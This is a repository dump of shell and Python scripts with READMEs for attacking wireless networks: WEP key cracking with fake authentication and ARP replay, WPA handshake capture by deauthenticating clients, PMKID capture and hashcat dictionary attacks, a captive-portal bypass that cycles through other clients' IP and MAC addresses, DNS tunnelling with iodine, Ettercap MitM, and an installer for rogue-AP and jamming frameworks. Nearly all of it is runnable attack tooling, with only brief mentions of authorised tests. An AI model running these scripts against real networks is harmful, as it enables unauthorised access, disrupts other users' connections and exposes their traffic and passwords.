├── scripts
├── open
│ ├── start_ettercap.sh
│ ├── start_wireshark.sh
│ ├── iodine_client.sh
│ ├── iodine_server.sh
│ ├── get_mac_ip.sh
│ ├── change_mac_ip.sh
│ ├── get_mac_ip.py
│ ├── README.md
│ └── change_mac_ip.py
├── wep
│ ├── wep_crack.sh
│ ├── wep_attack.sh
│ ├── wep_monitor.sh
│ └── README.md
├── wpa
│ ├── wpa_crack.sh
│ ├── wpa_attack.sh
│ ├── wpa_monitor.sh
│ ├── wpa_pyrit.sh
│ ├── pmkid_install.sh
│ ├── pmkid.sh
│ ├── README.md
│ └── py_pmkid.py
├── basic_commands
│ ├── monitor.sh
│ ├── airodump.sh
│ └── README.md
├── other_frameworks
│ ├── README.md
│ └── install.sh
└── README.md
└── README.md
/scripts/open/start_ettercap.sh:
--------------------------------------------------------------------------------
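#!/bin/sh
# Launch the Ettercap GTK GUI (used for the ARP-spoofing MitM step of the guide).
# Raw-socket capture and ARP injection need root, hence sudo.
# "#!/sh" was not a valid interpreter path; the script only worked when run as "sh script".
sudo ettercap -G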
--------------------------------------------------------------------------------
/scripts/open/start_wireshark.sh:
--------------------------------------------------------------------------------
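#!/bin/sh
# Launch Wireshark in the background.
# Running a large protocol-parser GUI as root is discouraged: when the current user is in the
# "wireshark" group (dumpcap carries the capture capabilities) start it unprivileged and only
# fall back to sudo otherwise.
if id -nG 2>/dev/null | tr ' ' '\n' | grep -qx wireshark; then
  wireshark &
else
  sudo wireshark &
fi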
--------------------------------------------------------------------------------
/scripts/wep/wep_crack.sh:
--------------------------------------------------------------------------------
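#!/bin/sh
# Recover a WEP key from a capture that holds enough IVs.
# Usage: sh wep_crack.sh <capture file>     (PCAP_FILE from the environment is used as a fallback)
# The README passes the file as the first argument, but the script only read $PCAP_FILE; both work now.
# airodump-ng -w <prefix> writes <prefix>-01.cap: pass that file, not the bare prefix.
PCAP_FILE="${1:-$PCAP_FILE}"
if [ -z "$PCAP_FILE" ]; then
  echo "usage: $0 <capture file>" >&2
  exit 1
fi
aircrack-ng "$PCAP_FILE"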
--------------------------------------------------------------------------------
/scripts/wpa/wpa_crack.sh:
--------------------------------------------------------------------------------
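#!/bin/sh
# Dictionary attack on a captured WPA/WPA2 4-way handshake with aircrack-ng.
# Usage: WORDLIST=<wordlist> sh wpa_crack.sh <capture file>   (PCAP_FILE from the environment is a fallback)
# The README passes the file as the first argument, but the script only read $PCAP_FILE; both work now.
# aircrack-ng refuses to attack WPA without a wordlist (-w), which the original invocation never supplied.
# The capture written by airodump-ng -w <prefix> is <prefix>-01.cap.
PCAP_FILE="${1:-$PCAP_FILE}"
if [ -z "$PCAP_FILE" ]; then
  echo "usage: WORDLIST=<wordlist> $0 <capture file>" >&2
  exit 1
fi
if [ -n "$WORDLIST" ]; then
  aircrack-ng -w "$WORDLIST" "$PCAP_FILE"
else
  echo "WORDLIST is not set: aircrack-ng cannot crack WPA without a wordlist" >&2
  aircrack-ng "$PCAP_FILE"
fi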
--------------------------------------------------------------------------------
/scripts/open/iodine_client.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | iodine -f -P $1 $2 $3
3 |
4 |
--------------------------------------------------------------------------------
/scripts/wpa/wpa_attack.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | aireplay-ng -0 1 -a $2 -c $3 $1
3 |
4 |
--------------------------------------------------------------------------------
/scripts/open/iodine_server.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | iodined -f -c -P $1 -n $2 10.0.0.1 $3
3 |
4 |
--------------------------------------------------------------------------------
/scripts/wep/wep_attack.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | aireplay-ng -1 0 -a $2 -h $3 $1
3 | aireplay-ng -3 -b $2 -h $3 $1
4 | aireplay-ng -0 1 -a $2 -c $4 $1
5 |
--------------------------------------------------------------------------------
/scripts/basic_commands/monitor.sh:
--------------------------------------------------------------------------------
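#!/bin/sh
# Put a wireless interface into monitor mode.
# Usage: sh monitor.sh <interface>   (needs root)
# IFACE='$1' (single quotes) used to store the literal text "$1", so the interface was never set.
# Equivalent with the newer tools: ip link set <iface> down; iw dev <iface> set type monitor; ip link set <iface> up
IFACE="$1"
if [ -z "$IFACE" ]; then
  echo "usage: $0 <interface>" >&2
  exit 1
fi
set -e
# Stop NetworkManager, wpa_supplicant & co.; they would flip the interface back to managed mode.
airmon-ng check kill
# The mode can only be changed while the interface is down.
ifconfig "$IFACE" down
iwconfig "$IFACE" mode monitor
ifconfig "$IFACE" up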
--------------------------------------------------------------------------------
/scripts/open/get_mac_ip.sh:
--------------------------------------------------------------------------------
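#!/bin/sh
# List "<ip> <mac>" for every host that answers an nmap ping sweep of the given network.
# Usage: sh get_mac_ip.sh <network>     e.g. sh get_mac_ip.sh 192.168.79.0/24
# nmap only reports MAC addresses when it runs as root on the same L2 segment (ARP), so use sudo.
# "$NETWORK=..." in the original expanded to a command named "=", so the variable was never set.
NETWORK="$1"
if [ -z "$NETWORK" ]; then
  echo "usage: $0 <network/cidr>" >&2
  exit 1
fi
# -sn is the current name of -sP (host discovery only). nmap prints
#   Nmap scan report for <ip>          (or "for <name> (<ip>)")
#   MAC Address: <mac> (<vendor>)      (as root only)
# so remember the last host seen and print it together with the MAC that follows.
nmap -sn "$NETWORK" | awk '
  /^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }
  /^MAC Address:/         { print ip, $3 }
'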
--------------------------------------------------------------------------------
/scripts/wep/wep_monitor.sh:
--------------------------------------------------------------------------------
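#!/bin/sh
# Put the interface into monitor mode and record all traffic to a capture prefix (WEP IV collection).
# Usage: sh wep_monitor.sh <interface> <capture prefix>   (needs root)
# airodump-ng writes <prefix>-01.cap; that is the file wep_crack.sh needs.
# IFACE='$1' (single quotes) used to store the literal text "$1", so the interface was never set.
IFACE="$1"
PREFIX="$2"
if [ -z "$IFACE" ] || [ -z "$PREFIX" ]; then
  echo "usage: $0 <interface> <capture prefix>" >&2
  exit 1
fi
set -e
# Stop NetworkManager, wpa_supplicant & co.; they would flip the interface back to managed mode.
airmon-ng check kill
ifconfig "$IFACE" down
iwconfig "$IFACE" mode monitor
ifconfig "$IFACE" up
# Add "-c <channel> --bssid <AP MAC>" (as in the guide) to stay on the target instead of channel hopping.
airodump-ng "$IFACE" -w "$PREFIX"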
--------------------------------------------------------------------------------
/scripts/basic_commands/airodump.sh:
--------------------------------------------------------------------------------
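#!/bin/sh
# Put the interface into monitor mode and list nearby networks and clients with airodump-ng.
# Usage: sh airodump.sh <interface>   (needs root)
# IFACE='$1' (single quotes) used to store the literal text "$1", so the interface was never set.
IFACE="$1"
if [ -z "$IFACE" ]; then
  echo "usage: $0 <interface>" >&2
  exit 1
fi
set -e
# Stop NetworkManager, wpa_supplicant & co.; they would flip the interface back to managed mode.
airmon-ng check kill
ifconfig "$IFACE" down
iwconfig "$IFACE" mode monitor
ifconfig "$IFACE" up
airodump-ng "$IFACE"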
--------------------------------------------------------------------------------
/scripts/other_frameworks/README.md:
--------------------------------------------------------------------------------
1 | # Other frameworks
2 |
`install.sh` downloads and installs the following frameworks. Each one is cloned from its upstream repository without pinning and its setup script is then run as root, so review the checkouts before running it outside a disposable lab machine:
4 | - wifiphisher
5 | - wifijammer
6 | - SniffAir
7 | - WiFi-Pumpkin
8 | - eaphammer
9 |
10 |
--------------------------------------------------------------------------------
/scripts/wpa/wpa_monitor.sh:
--------------------------------------------------------------------------------
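#!/bin/sh
# Put the interface into monitor mode and record all traffic to a capture prefix (WPA handshake capture).
# Usage: sh wpa_monitor.sh <interface> <capture prefix>   (needs root)
# The interface used to be hard-coded to wlan0 and the first argument ignored; wlan0 is now only the default.
# airodump-ng writes <prefix>-01.cap; that is the file to hand to aircrack-ng or pyrit.
IFACE="${1:-wlan0}"
PREFIX="$2"
if [ -z "$PREFIX" ]; then
  echo "usage: $0 <interface> <capture prefix>" >&2
  exit 1
fi
set -e
# Stop NetworkManager, wpa_supplicant & co.; they would flip the interface back to managed mode.
airmon-ng check kill
ifconfig "$IFACE" down
iwconfig "$IFACE" mode monitor
ifconfig "$IFACE" up
# Add "-c <channel> --bssid <AP MAC>" to stay on the target's channel; channel hopping can miss the handshake.
airodump-ng "$IFACE" -w "$PREFIX"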
--------------------------------------------------------------------------------
/scripts/wpa/wpa_pyrit.sh:
--------------------------------------------------------------------------------
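#!/bin/sh
# Crack a captured WPA handshake with Pyrit (Python 2 project, no longer maintained).
# Usage: WORDLIST=<wordlist> sh wpa_pyrit.sh <capture file>
# The capture written by airodump-ng -w <prefix> is <prefix>-01.cap.
set -e
PCAP_FILE="$1"
if [ -z "$PCAP_FILE" ] || [ -z "$WORDLIST" ]; then
  echo "usage: WORDLIST=<wordlist> $0 <capture file>" >&2
  exit 1
fi
# Put the stripped capture next to the original. The old "clean_$1" broke for any path with a
# directory component (clean_captures/x.cap).
CLEAN_PCAP_FILE="$(dirname "$PCAP_FILE")/clean_$(basename "$PCAP_FILE")"

# Show the handshakes pyrit finds in the capture.
pyrit -r "$PCAP_FILE" analyze
# Keep only the frames needed for cracking.
pyrit -r "$PCAP_FILE" -o "$CLEAN_PCAP_FILE" strip
# Load the wordlist into pyrit's database.
pyrit -i "$WORDLIST" import_passwords
pyrit eval
# Precompute the PMKs (the slow part; GPU-accelerated when available).
# NOTE(review): if attack_db complains that the ESSID is not in the database, run
# "pyrit -e <ESSID> create_essid" before "pyrit batch" - confirm with the installed pyrit.
pyrit batch
pyrit -r "$CLEAN_PCAP_FILE" attack_db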
--------------------------------------------------------------------------------
/scripts/wpa/pmkid_install.sh:
--------------------------------------------------------------------------------
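#!/bin/sh
# Build and install hcxdumptool and hcxtools (ZerBea) from source for the PMKID attack.
# Needs a C toolchain and the libraries their Makefiles require; "make install" needs root.
# The clones are unpinned and unverified: pin a tag or commit you have reviewed for anything but a lab VM.
set -e

SUDO=''
if [ "$(id -u)" -ne 0 ]; then
  SUDO='sudo'
fi

# build_tool <repo name>: clone if missing, then build and install in a subshell so that a
# failing step never leaves the caller in the wrong directory (the old "cd .. " chain did).
build_tool() {
  [ -d "$1" ] || git clone "https://github.com/ZerBea/$1.git"
  ( cd "$1" && make && $SUDO make install )
}

build_tool hcxdumptool
build_tool hcxtools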
--------------------------------------------------------------------------------
/scripts/basic_commands/README.md:
--------------------------------------------------------------------------------
1 | ## Basic commands
2 |
- *monitor.sh* - Put a wireless interface into monitor mode (kills NetworkManager & co. first; needs root)
4 |
5 | ```
6 | sh monitor.sh $INTERFACE
7 | ```
8 |
- *airodump.sh* - Put a wireless interface into monitor mode and run airodump-ng on it (needs root)
10 |
11 | ```
12 | sh airodump.sh $INTERFACE
13 | ```
--------------------------------------------------------------------------------
/scripts/open/change_mac_ip.sh:
--------------------------------------------------------------------------------
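#!/bin/sh
# Give an interface a specific MAC address and a static IPv4 configuration
# (used to impersonate an already-authenticated client on a captive-portal network).
# Usage: sh change_mac_ip.sh <interface> <ip address> <gateway> <mac address> [<netmask>]
# Needs root. The netmask defaults to 255.255.255.0, as before.
# Caution: while the client whose addresses you copy is still online the two devices clash
# (duplicate IP and MAC), which is disruptive and visible - only do this on authorised tests.
if [ $# -lt 4 ]; then
  echo "usage: $0 <interface> <ip address> <gateway> <mac address> [<netmask>]" >&2
  exit 1
fi
IFACE="$1"
IP="$2"
GW="$3"
MAC="$4"
NETMASK="${5:-255.255.255.0}"

# Refuse a malformed MAC before touching the link; "ip link" would otherwise fail with the link down.
case "$MAC" in
  [0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]:[0-9A-Fa-f][0-9A-Fa-f]) ;;
  *)
    echo "invalid MAC address: $MAC" >&2
    exit 1
    ;;
esac

set -e
# The hardware address can only be changed while the link is down.
ip link set "$IFACE" down
ip link set dev "$IFACE" address "$MAC"
ip link set "$IFACE" up
# Drop whatever DHCP assigned before configuring the spoofed address.
ip addr flush dev "$IFACE"

ifconfig "$IFACE" "$IP" netmask "$NETMASK" up
# "route add" fails when a default route already exists (e.g. via another interface); warn instead of aborting.
route add default gw "$GW" || echo "warning: could not add default route via $GW" >&2

echo "New IP: $IP"
echo "New MAC: $MAC"
echo

# Informational only; iwconfig returns non-zero on a non-wireless interface.
iwconfig "$IFACE" || true
ifconfig "$IFACE"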
--------------------------------------------------------------------------------
/scripts/wep/README.md:
--------------------------------------------------------------------------------
1 | ## WEP
2 |
3 | - *wep_monitor.sh* - Set monitor mode and start monitoring networks
4 |
5 | ```
6 | sh wep_monitor.sh $INTERFACE $PCAP_NAME
7 | ```
8 |
- *wep_attack.sh* - Attack the network (fake authentication + ARP request replay + one client deauth) and let it run until airodump-ng shows around 100,000 IVs
10 |
11 | ```
sh wep_attack.sh $INTERFACE $AP_MAC $MY_MAC $CLIENT_MAC
13 | ```
14 |
- *wep_crack.sh* - Crack the WEP key from the capture file (airodump-ng writes it as `$PCAP_NAME-01.cap`)
16 |
17 | ```
sh wep_crack.sh $PCAP_NAME
```
--------------------------------------------------------------------------------
/scripts/other_frameworks/install.sh:
--------------------------------------------------------------------------------
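#!/bin/sh
# Install the packaged tools used in the guide and clone/install the third-party frameworks
# listed in README.md into ./other_frameworks.
# Supply-chain note: every framework is cloned from its default branch with no pinning or
# signature check, and its installer is then run as root. Read the checkout (or pin a tag or
# commit you have reviewed) before running this anywhere but a disposable lab VM.
# NOTE(review): "python" below is whatever the system provides; these projects historically
# targeted Python 2 - confirm against the installed versions.
set -e

sudo apt-get install aircrack-ng httrack ettercap iodine wireshark

# Reuse the directory if it exists. The old "mkdir X && cd X" skipped the cd when mkdir failed
# and then cloned everything into the current directory instead.
mkdir -p other_frameworks
cd other_frameworks

# clone_and_install <repo url> <install command...>
# Clones the repository (skipped when the directory is already present) and runs the install
# command inside it in a subshell, so a failing installer cannot leave us in the wrong directory.
clone_and_install() {
  repo_url="$1"
  shift
  dir="${repo_url##*/}"
  [ -d "$dir" ] || git clone "$repo_url"
  ( cd "$dir" && "$@" )
}

clone_and_install https://github.com/wifiphisher/wifiphisher sudo python setup.py install
clone_and_install https://github.com/DanMcInerney/wifijammer sudo python setup.py install
clone_and_install https://github.com/Tylous/SniffAir sudo ./setup.sh
clone_and_install https://github.com/P0cL4bs/WiFi-Pumpkin sudo ./installer.sh --install
clone_and_install https://github.com/s0lst1c3/eaphammer sudo ./kali-setup

cd ..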
--------------------------------------------------------------------------------
/scripts/wpa/pmkid.sh:
--------------------------------------------------------------------------------
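#!/bin/sh
# PMKID attack against one access point: capture a PMKID with hcxdumptool, convert it with
# hcxpcaptool and run a hashcat dictionary attack on the result.
# Usage: IFACE=<monitor iface> sh pmkid.sh <AP MAC> <wordlist> [<monitor iface>]
# Needs root (802.11 injection and "make install").
# Fixes vs. the original: MAC/WORDLIST were single-quoted (literal "$1"/"$2"), the "[ ! -d x]" tests
# were missing the space before "]", --enable__status had a double underscore, and $IFACE was
# read from the environment without ever being checked.
# NOTE(review): recent hcxdumptool/hcxtools/hashcat releases renamed these options and tools
# (hcxpcapngtool, hashcat mode 22000) - confirm against the versions actually installed.
set -e

MAC="$1"
WORDLIST="$2"
IFACE="${3:-$IFACE}"
FILTER_FILE='filter.txt'
PCAPNG_FILE='temp.pcapng'
HASH_FILE='temp_hash'

if [ -z "$MAC" ] || [ -z "$WORDLIST" ] || [ -z "$IFACE" ]; then
  echo "usage: IFACE=<monitor iface> $0 <AP MAC> <wordlist> [<monitor iface>]" >&2
  exit 1
fi
if [ ! -f "$WORDLIST" ]; then
  echo "wordlist not found: $WORDLIST" >&2
  exit 1
fi

SUDO=''
if [ "$(id -u)" -ne 0 ]; then
  SUDO='sudo'
fi

# install_tool <repo name> <binary>: build a ZerBea tool from source unless <binary> is already
# installed. The build runs in a subshell so a failing step cannot leave us in the wrong directory.
# The clone is unpinned and unverified - pin a reviewed tag/commit for anything but a lab VM.
install_tool() {
  if command -v "$2" >/dev/null 2>&1; then
    return 0
  fi
  [ -d "$1" ] || git clone "https://github.com/ZerBea/$1.git"
  ( cd "$1" && make && $SUDO make install )
}
install_tool hcxdumptool hcxdumptool
install_tool hcxtools hcxpcaptool

# hcxdumptool's filter list wants the BSSID as 12 hex digits without separators.
printf '%s\n' "$MAC" | tr -d ':' > "$FILTER_FILE"

# --filtermode=2: attack only the BSSIDs in the list. The operator stops the capture with Ctrl-C
# once "FOUND PMKID" is shown; handle SIGINT in this shell (no-op) so that only hcxdumptool is
# interrupted and the conversion and cracking steps below still run.
trap ':' INT
$SUDO hcxdumptool -i "$IFACE" -o "$PCAPNG_FILE" --enable_status=1 --filterlist="$FILTER_FILE" --filtermode=2 \
  || echo "hcxdumptool exited with status $? - continuing with the capture so far" >&2
trap - INT

# Extract the hash line(s): PMKID*AP MAC*STATION MAC*ESSID (ESSID hex-encoded).
hcxpcaptool -z "$HASH_FILE" "$PCAPNG_FILE"

# --force only silences hashcat's OpenCL/driver warnings; remove it once the drivers are set up.
hashcat -a 0 -m 16800 "$HASH_FILE" "$WORDLIST" --force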
--------------------------------------------------------------------------------
/scripts/open/get_mac_ip.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import argparse as arg
3 | import nmap
4 |
parser = arg.ArgumentParser(
    description="List the IP and MAC address of every live host in the /24 of ADDRESS "
                "(MAC addresses are only available when run as root)."
)
# Both options are mandatory; their values are read by main() through the module-level `argument`.
for flag, option, text in (("-i", "--interface", "Interface"), ("-a", "--address", "IP address")):
    parser.add_argument(flag, option, help=text, required=True)
argument = parser.parse_args()
9 |
10 |
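def scan_mac(ip, iface='wlan0', scanner=None):
    """Ping-sweep the network around `ip` and return [{'ip': ..., 'mac': ...}, ...] for every host found.

    ip:      an address in the target network ("192.168.1.5", scanned as /24) or a CIDR network
             ("192.168.1.0/24", used as is - the original always appended "/24", producing "x/24/24").
    iface:   interface nmap sends from, passed with "-e". The original appended the name to the
             options without "-e", which made nmap treat it as an extra target hostname.
    scanner: object with a .scan(hosts=, arguments=, sudo=) method; defaults to nmap.PortScanner().
             Exists so the result parsing can be tested without running nmap.

    Returns an unsorted list; 'mac' is None for hosts nmap reported without a MAC (MACs are only
    available when scanning as root on the local L2 segment). Returns [] when nmap found nothing.
    """
    if scanner is None:
        scanner = nmap.PortScanner()
    hosts = ip if '/' in ip else ip + '/24'
    # -sn is the current spelling of the old -sP (host discovery only).
    result = scanner.scan(hosts=hosts, arguments='-sn -e ' + iface, sudo=True)
    found = (result or {}).get('scan') or {}
    return [{'ip': host, 'mac': info.get('addresses', {}).get('mac')}
            for host, info in found.items()]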
18 |
19 |
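def main():
    """Scan with the command-line options and print one {'ip': ..., 'mac': ...} dict per host.

    Hosts are sorted by the IP as a string (lexicographic, so "10.0.0.10" precedes "10.0.0.9").
    Uses print() so the script also runs under Python 3; "print j" was Python 2 only.
    """
    res = scan_mac(argument.address, argument.interface)
    for entry in sorted(res, key=lambda item: item['ip']):
        print(entry)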
24 |
25 |
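# Only run when executed as a script, so importing the helpers elsewhere does not start a scan.
if __name__ == "__main__":
    main()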
--------------------------------------------------------------------------------
/scripts/wpa/README.md:
--------------------------------------------------------------------------------
1 | ## WPA
2 |
3 | - *wpa_monitor.sh* - Set monitor mode and start monitoring networks
4 |
5 | ```
6 | sh wpa_monitor.sh $INTERFACE $PCAP_NAME
7 | ```
8 |
9 | - *wpa_attack.sh* - Deauthenticate a client to get a 4-way handshake to crack
10 |
11 | ```
12 | sh wpa_attack.sh $INTERFACE $AP_MAC $CLIENT_MAC
13 | ```
14 |
- *wpa_crack.sh* - Crack the handshake in the capture file (`$PCAP_NAME-01.cap` as written by airodump-ng) using Aircrack-ng; WPA cracking needs a wordlist (`aircrack-ng -w $WORDLIST ...`)
16 |
17 | ```
18 | sh wpa_crack.sh $PCAP_NAME
19 | ```
20 |
- *wpa_pyrit.sh* - Crack the capture file using Pyrit (the wordlist is read from the `WORDLIST` environment variable)
22 |
23 | ```
24 | sh wpa_pyrit.sh $PCAP_NAME
25 | ```
26 |
- *pmkid_install.sh* - Build and install hcxdumptool and hcxtools from their GitHub sources for the PMKID attack (unpinned clones; review them first)
28 |
29 | ```
30 | sh pmkid_install.sh
31 | ```
32 |
- *pmkid.sh* - Run the PMKID attack against one AP (the monitor-mode interface is read from the `IFACE` environment variable; needs root)
34 |
35 | ```
IFACE=$MON_INTERFACE sh pmkid.sh $MAC_ADDRESS $DICTIONARY
37 | ```
38 |
39 | - *py_pmkid.py* - Run the PMKID attack
40 |
41 | ```
42 | python py_pmkid.py [-h] [-f FILTER_FILE] [-p PCAP_FILE] [-j HASH_FILE] -d DICTIONARY -i MON_INTERFACE -m MAC_ADDRESS
43 | ```
--------------------------------------------------------------------------------
/scripts/open/README.md:
--------------------------------------------------------------------------------
1 | ## Open networks
2 |
- *change_mac_ip.py* - Scan the network for IP/MAC pairs and adopt each pair on your interface in turn until Internet access works (captive-portal MAC-spoofing bypass; needs root)
4 |
5 | ```
6 | python change_mac_ip.py [-h] -a ADDRESS -i INTERFACE
7 | ```
8 |
9 | - *change_mac_ip.sh* - Change IP and MAC address of an interface to specific values
10 |
11 | ```
sh change_mac_ip.sh $INTERFACE $IP_ADDRESS $GATEWAY $MAC_ADDRESS
13 | ```
14 |
15 | - *get_mac_ip.py* - List IP and MAC addresses of devices in your network
16 |
17 | ```
18 | python get_mac_ip.py [-h] -i INTERFACE -a ADDRESS
19 | ```
20 |
21 | - *get_mac_ip.sh* - List IP and MAC addresses of devices in your network
22 |
23 | ```
24 | sh get_mac_ip.sh $NETWORK
25 | ```
26 |
27 | Example: *sh get_mac_ip.sh 192.168.79.0/24*
28 |
29 |
- *iodine_server.sh* - Start the iodine server (the password is passed on the command line, so it is visible in the process list while the server runs)
31 |
32 | ```
33 | sh iodine_server.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
34 | ```
35 |
- *iodine_client.sh* - Connect to the iodine server (same password caveat; iodine does not encrypt the tunnelled traffic, so run SSH or a VPN through it)
37 |
38 | ```
39 | sh iodine_client.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
40 | ```
41 |
42 | - *start_ettercap.sh* - Run ettercap in graphical mode
43 |
44 | ```
45 | sh start_ettercap.sh
46 | ```
47 |
48 | - *start_wireshark.sh* - Run wireshark
49 |
50 | ```
51 | sh start_wireshark.sh
52 | ```
53 |
--------------------------------------------------------------------------------
/scripts/wpa/py_pmkid.py:
--------------------------------------------------------------------------------
import argparse
import os, sys
import subprocess
3 |
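def get_args(argv=None):
    """Parse the command-line options of the PMKID attack.

    argv: list of arguments to parse; None means sys.argv[1:] (argparse's default), which keeps
          the old no-argument call working while letting tests pass an explicit list.
    Returns the argparse Namespace (filter_file, pcap_file, hash_file, dictionary, mon_interface, mac).
    Note: the defaults given on the required options (-d, -i) are never used, since argparse
    rejects the command line when a required option is missing.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', '--filter_file', required=False, action='store', help='FIlter file name', default="filtermac.txt")
    parser.add_argument('-p', '--pcap_file', required=False, action='store', help='Pcap file name', default="output.pcapng")
    parser.add_argument('-j', '--hash_file', required=False, action='store', help='Hash file name', default = "PMKID-hash")
    parser.add_argument('-d', '--dictionary', required=True, action='store', help='Dictionary', default="rockyou.txt")
    parser.add_argument('-i', '--mon_interface', required=True, action='store', help='Interface in monitor mode', default = "mon0")
    parser.add_argument('-m', '--mac', required=True, action='store', help='MAC')
    my_args = parser.parse_args(argv)
    return my_args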
14 |
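def _run(cmd):
    """Run an argv list and return its exit status.

    Ctrl-C is how the operator stops hcxdumptool. The child receives the SIGINT as well; this
    helper swallows the resulting KeyboardInterrupt once and waits for the child, so the
    remaining steps still run (os.system used to give the same effect by masking SIGINT).
    """
    proc = subprocess.Popen(cmd)
    try:
        return proc.wait()
    except KeyboardInterrupt:
        return proc.wait()


def main():
    """Capture a PMKID from the target AP, extract the hash line and run a hashcat dictionary attack.

    Steps (all need root and an interface already in monitor mode):
      1. write the BSSID (12 hex digits, no separators) to the filter file,
      2. hcxdumptool attacks only that BSSID (--filtermode=2) until stopped with Ctrl-C,
      3. hcxpcaptool converts the pcapng into PMKID*AP MAC*STATION MAC*ESSID hash lines,
      4. hashcat mode 16800 runs the wordlist against them.
    Commands are passed as argument lists, so file names and the MAC are never interpreted by a
    shell (the original built "echo ... > file" and the tool invocations as shell strings).
    """
    args = get_args()
    filter_file = args.filter_file
    pcapng_file = args.pcap_file
    hash_file = args.hash_file
    dicc_wpa = args.dictionary  # was args.mon_interface: hashcat received the interface name as its wordlist
    iface = args.mon_interface
    mac = args.mac.replace(":", "").replace("-", "")
    if len(mac) != 12 or any(c not in "0123456789abcdefABCDEF" for c in mac):
        sys.exit("invalid MAC address: %s" % args.mac)

    # Create the filter file
    with open(filter_file, "w") as fh:
        fh.write(mac + "\n")

    # Capture the PMKID
    print("Do not stop the capture until you see [FOUND PMKID]")
    _run(["hcxdumptool", "-i", iface, "-o", pcapng_file, "--enable_status=1",
          "--filterlist=" + filter_file, "--filtermode=2"])

    # Extract the hash
    _run(["hcxpcaptool", "-z", hash_file, pcapng_file])

    # Dictionary attack. --force only hides hashcat's OpenCL/driver warnings; drop it once the drivers are set up.
    _run(["hashcat", "-a", "0", "-m", "16800", hash_file, dicc_wpa, "--force"])


if __name__ == "__main__":
    main()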
35 |
--------------------------------------------------------------------------------
/scripts/open/change_mac_ip.py:
--------------------------------------------------------------------------------
import sys,os
import argparse as arg
import subprocess
import nmap
try:
    import urllib2
except ImportError:  # Python 3: urllib.request provides urlopen under the same attribute name
    import urllib.request as urllib2
5 |
parser = arg.ArgumentParser(
    description="Scan the /24 of ADDRESS for IP/MAC pairs and adopt them on INTERFACE one by one "
                "until Internet access works (needs root)."
)
# Both options are mandatory; main() reads them through the module-level `argument`.
for flag, option, text in (("-a", "--address", "IP address"), ("-i", "--interface", "Interface")):
    parser.add_argument(flag, option, help=text, required=True)
argument = parser.parse_args()
10 |
11 |
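def scan_(ip, scanner=None):
    """Ping-sweep the network around `ip` and return [{'ip': ..., 'mac': ...}, ...] for every host found.

    ip:      an address in the target network ("192.168.1.5", scanned as /24) or a CIDR network
             ("192.168.1.0/24", used as is - the original always appended "/24").
    scanner: object with a .scan(hosts=, arguments=, sudo=) method; defaults to nmap.PortScanner().
             Exists so the result parsing can be tested without running nmap.

    Returns an unsorted list; 'mac' is None for hosts nmap reported without a MAC (MACs are only
    available when scanning as root on the local L2 segment). Returns [] when nmap found nothing.
    """
    if scanner is None:
        scanner = nmap.PortScanner()
    hosts = ip if '/' in ip else ip + '/24'
    result = scanner.scan(hosts=hosts, arguments='-sn ', sudo=True)
    found = (result or {}).get('scan') or {}
    return [{'ip': host, 'mac': info.get('addresses', {}).get('mac')}
            for host, info in found.items()]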
19 |
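def change(ip, mac, iface):
    """Configure `iface` with the given IP and MAC and report whether the Internet is reachable afterwards.

    ip:    IPv4 address to assume. The gateway is assumed to be host .1 of the same /24
           (NOTE(review): an assumption carried over from the original - confirm per network).
    mac:   MAC address to assume; None (host without a known MAC) is skipped and returns False.
    iface: interface to reconfigure.

    Returns True when a plain-HTTP request to a fixed Google IP completes within 1 s, False
    otherwise. A captive portal that redirects the request to its own page can still yield True.
    Needs root. Reusing a live client's addresses clashes with that client (duplicate IP/MAC);
    use only on authorised tests.
    Commands are passed as argument lists: the addresses come from scan output, not from a
    trusted source, so they must never be interpolated into a shell string.
    """
    if mac is None:
        return False
    gw_arr = ip.split(".")
    if len(gw_arr) != 4:
        return False
    gw_arr[3] = "1"
    gw_address = ".".join(gw_arr)

    # The MAC can only be changed while the link is down; flush removes the DHCP-assigned address.
    for cmd in (["ip", "link", "set", iface, "down"],
                ["ip", "link", "set", "dev", iface, "address", mac],
                ["ip", "link", "set", iface, "up"],
                ["ip", "addr", "flush", "dev", iface],
                ["ifconfig", iface, ip, "netmask", "255.255.255.0", "up"],
                ["route", "add", "default", "gw", gw_address]):
        subprocess.call(cmd)

    print("Testing IP %s and MAC %s" % (ip, mac))
    subprocess.call(["ping", "-c", "2", "8.8.8.8"])
    try:
        urllib2.urlopen('http://216.58.192.142', timeout=1)
        return True
    except Exception:
        # Any failure (timeout, DNS-less connect error, HTTP error) means this pair does not give access.
        return False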
40 |
41 |
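def main():
    """Scan the network, list every IP/MAC pair, then try each pair on the interface until one gets Internet access.

    The list is sorted once by the IP as a string (lexicographic order). Uses print() so the
    script also runs under Python 3; "print "..."" was Python 2 only.
    """
    res = scan_(argument.address)
    ordered = sorted(res, key=lambda i: i['ip'])
    print("IP and Mac list")
    for j in ordered:
        print("IP :%s / MAC: %s" % (j['ip'], j['mac']))
    for j in ordered:
        # change() reconfigures the interface and returns True as soon as an HTTP request gets out.
        if change(j['ip'], j['mac'], argument.interface):
            break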
51 |
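# Only run when executed as a script, so importing the helpers elsewhere does not reconfigure interfaces.
if __name__ == "__main__":
    main()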
53 |
--------------------------------------------------------------------------------
/scripts/README.md:
--------------------------------------------------------------------------------
1 | # Scripts
2 |
3 | ## Basic commands
4 |
- *monitor.sh* - Put a wireless interface into monitor mode (kills NetworkManager & co. first; needs root)
6 |
7 | ```
8 | sh monitor.sh $INTERFACE
9 | ```
10 |
- *airodump.sh* - Put a wireless interface into monitor mode and run airodump-ng on it (needs root)
12 |
13 | ```
14 | sh airodump.sh $INTERFACE
15 | ```
16 |
17 |
18 | ## Open networks
19 |
- *change_mac_ip.py* - Scan the network for IP/MAC pairs and adopt each pair on your interface in turn until Internet access works (captive-portal MAC-spoofing bypass; needs root)
21 |
22 | ```
23 | python change_mac_ip.py [-h] -a ADDRESS -i INTERFACE
24 | ```
25 |
26 | - *change_mac_ip.sh* - Change IP and MAC address of an interface to specific values
27 |
28 | ```
